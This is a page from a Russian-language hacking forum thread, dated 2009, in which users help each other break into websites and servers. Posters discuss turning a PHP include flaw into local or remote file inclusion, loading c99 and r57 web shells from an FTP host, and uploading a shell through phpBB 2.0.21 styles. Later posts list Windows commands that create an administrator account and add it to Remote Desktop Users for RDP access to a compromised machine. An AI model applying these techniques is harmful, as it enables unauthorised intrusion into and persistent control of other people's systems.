ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 865 из 1393 « Первая < 365765815855 861 862 863 864 865 866 867 868 869 8759159651365 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #8641  
Старый 22.08.2009, 22:31
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию
для данного примера
если magic_quotes_gpc = On и allow_url_include = Off то инклуда не выйдет
если allow_url_include = On то возможен RFI хотя могу ошибаться..
magic_quotes_gpc = Off и allow_url_include = Off то тут только LFI
хотя еще интересно откуда взял код этого скрипта
 

  #8642  
Старый 22.08.2009, 22:38
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию
Цитата:
Сообщение от bons  
для данного примера
если magic_quotes_gpc = On и allow_url_include = Off то инклуда не выйдет
если allow_url_include = On то возможен RFI хотя могу ошибаться..
magic_quotes_gpc = Off и allow_url_include = Off то тут только LFI
хотя еще интересно откуда взял код этого скрипта
шаровый двиг.
У самого такой стоял...какойто умелец нацарапал : )
Ну вот на моём примере что-то можно сделать? тут 1 я виу что проверка только file_exists()
 

  #8643  
Старый 22.08.2009, 22:52
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Цитата:
Ну вот на моём примере что-то можно сделать? тут 1 я виу что проверка только file_exists()
http://forum.antichat.ru/thread23501.html ctrl +f "file_exists". Только LFI
 

  #8644  
Старый 22.08.2009, 23:11
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию
Цитата:
Сообщение от Pashkela  
http://forum.antichat.ru/thread23501.html ctrl +f "file_exists". Только LFI
почему только LFI?
при определенной удаче(allow_url_include = On) можно. Допустим если разместить шелл на ftp
 

  #8645  
Старый 23.08.2009, 01:34
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию
Pashkela, null байт и его замены не проходят
bons, пробовал на фтп залить...но когда указываю до фтп путь ничего не происходит
даж скрипт на false не уходит.
В чём может быть трабла? простто стараница пустая.

через 5мин...
Залил шелл на фтп с99 при открытии с сайта видна только шапка шелла...

через 10мин
Он просто обрезает шелл уже и р57 попробовал
Срезает по середине скрипта и всё...
Последний раз редактировалось Byrger; 23.08.2009 в 01:58..
 

  #8646  
Старый 23.08.2009, 02:29
_Quest_
Новичок
Регистрация: 21.05.2009
Сообщений: 11
Провел на форуме:
59923

Репутация: 65
По умолчанию
лью шелл в пхп бб 2.0.21 через Стили http://forum.antichat.ru/thread24488.html
получяю следующую ошибку:
Код:
 ./../templates/tmp/theme_info.cfg in /var/virtual/www/l.ru/httpdocs/forum/admin/admin_styles.php on line 78
Warning: include(./../templates/tmp/theme_info.cfg) [function.include]: failed to open stream: No such file or directory in /var/virtual/www/l.ru/httpdocs/forum/admin/admin_styles.php on line 78
 Warning: include() [function.include]: Failed opening './../templates/tmp/theme_info.cfg' for inclusion (include_path='.') in /var/virtual/www/l.ru/httpdocs/forum/admin/admin_styles.php on line 78
 

  #8647  
Старый 23.08.2009, 02:42
_Quest_
Новичок
Регистрация: 21.05.2009
Сообщений: 11
Провел на форуме:
59923

Репутация: 65
По умолчанию
Можно ли получить RDP доступ?
1 рутишь... это уже сам
2 создаешь админскую учетку:
net user учетка пароль /add
net localgroup administrators учетка /add
net accounts /maxpwage:unlimited

3 пуск -> выполнить -> mstsc.exe
 

  #8648  
Старый 23.08.2009, 03:40
_Quest_
Новичок
Регистрация: 21.05.2009
Сообщений: 11
Провел на форуме:
59923

Репутация: 65
По умолчанию
Залей шелл к примеру от р57 и все команды по порядку кликая выполнить.
 

  #8649  
Старый 23.08.2009, 05:01
xa-xa89
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394

Репутация: 74
Отправить сообщение для xa-xa89 с помощью ICQ
По умолчанию
Цитата:
Сообщение от DeluxeS  
Не помогает ((( к RDP подключается, проблемы с авторизацией
недо еще пользователя добавить в группу пользователей удаленного рабочего стола(Remote Desktop Users)
не всем пользователям разрешен доступ по RDP
 

  #8650  
Старый 23.08.2009, 10:14
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
net localgroup "Remote Desktop Users" учетка /add
__________________
Карфаген должен быть разрушен...
 
 
Страница 865 из 1393 « Первая < 365765815855 861 862 863 864 865 866 867 868 869 8759159651365 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ